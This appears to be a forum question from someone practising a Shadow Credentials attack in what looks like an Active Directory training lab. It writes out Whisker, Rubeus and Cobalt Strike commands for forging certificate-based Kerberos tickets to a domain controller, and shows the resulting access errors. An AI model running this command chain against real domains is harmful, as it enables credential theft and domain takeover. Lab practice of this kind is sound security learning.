Shadow Credentials attack with TGT and TGS
I am trying to replicate Shadow Credentials attack in Active Directory environment. My initial approach was to:
Use Whisker to create a new certificate on behalf of DC (successful):
Whisker.exe add /target:dc-2$Use the newly created certificate with Rubeus and ask a new TGT:
Rubeus.exe asktgt /user:dc$ /certificate:MIIJuAIBAzCCCXQ[snip cert] /password:"[certificate password]" /domain:[domain] /dc:dc-2.dev.cyberbotic.io /getcredentials /show /nowrapCreate a fake logon session (I'm using Coabalt Strike)
make_token [DC admin user] FakePassUse the TGT to create a new TGS for the CIFS service, that will allow me to access C$ and ADMIN$:
Rubeus.exe asktgs /ticket:doIGajCCBmagAwI[snip TGT ticket...] /service:cifs/dc.domain.com,CIFS/dc.domain.com /nowrap /ptt
Now, in theory, I should be able to get access to C$, but every time I list the contents ls \\dc\c$, I keep getting:
[-] could not open \\dc-2\c$\*: 1326 - ERROR_LOGON_FAILURE
Now, my initial theory would be that, using a TGS would also require a valid login session from my side and because I use a fake login session, the machine would deny my list request. That would be easily bypassed by using the TGT directly, so I used the base64 ticket and saved it locally:
[System.IO.File]::WriteAllBytes("C:\Tickets\ticket.kirbi", [System.Convert]::FromBase64String("doIGajCCBmagAwI[snip TGT...]"))
Then I imported in my fake login session:
kerberos_ticket_use C:\Tickets\ticket.kirbi
Now, everytime I try to list DC contents, I get:
[-] could not open \\dc-2\c$\*: 5 - ERROR_ACCESS_DENIED
I know that I miss something in my knowledge, and that's why the attack is unsuccessful, but what do I miss?
UPDATE: I was able to find out why I got:
1326 - ERROR_LOGON_FAILURE
This is beause I need to use full FQDN name when listing contents of the target machine (dc.domain.com). Now I always get:
5 - ERROR_ACCESS_DENIED
